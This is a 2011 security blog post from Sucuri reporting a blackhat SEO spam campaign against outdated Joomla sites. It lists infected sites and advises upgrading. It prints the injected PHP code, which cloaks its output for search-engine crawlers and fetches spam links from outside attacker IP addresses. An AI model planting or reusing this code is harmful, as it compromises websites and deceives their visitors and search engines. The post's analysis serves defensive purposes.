• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

February 15, 2011David Dede

0
SHARES
FacebookTwitterSubscribe

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14). This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

if (preg_match(‘/live|msn|yahoo|Google|ask|aol|bot|google/’, $_SERVER[‘HTTP_USER_AGENT’])) {
$get = “http://188.72.201.11/bots.php?host=”.$_SERVER[‘HTTP_HOST’];
if (function_exists(“curl_init”)) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $get);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
echo $out;
} else {
$out = file_get_contents($get);
echo $out;
}

These are some of the sites we identified so far: (some .govs, some small banks, many russian, etc).

www.grameen.com – Grameen Bank
corteconstitucional.gov.ec – Ecuador .gov
www.lalibertad.gob.ec – Ecuador .gov
cce.gov.ec – Ecuador .gov
www.image-live.com
www.chic-association.com
morpeh.org
www.kdv-de-kangoeroe.nl
www.stm.pt
www.tocyprus.org
www.iimbaa.org
www.victrolacoffee.com
www.hhcag.org.uk
www.glenchem.com
www.buddies.pl
www.weddings-in-prague.com
sollat.eng.usm.my
www.boostconference.org

If you are using Joomla, make sure it is upgraded to avoid getting hacked. You can also check if your site is infected by scanning it in here: http://sitecheck.sucuri.net


Having security problems? Malware? Blacklisted? We can fix it for you: http://sucuri.net

0
SHARES
FacebookTwitterSubscribe

Categories: Joomla Security, Website Malware InfectionsTags: Hacked Websites, Malware Updates, SEO Spam

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Joomla Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.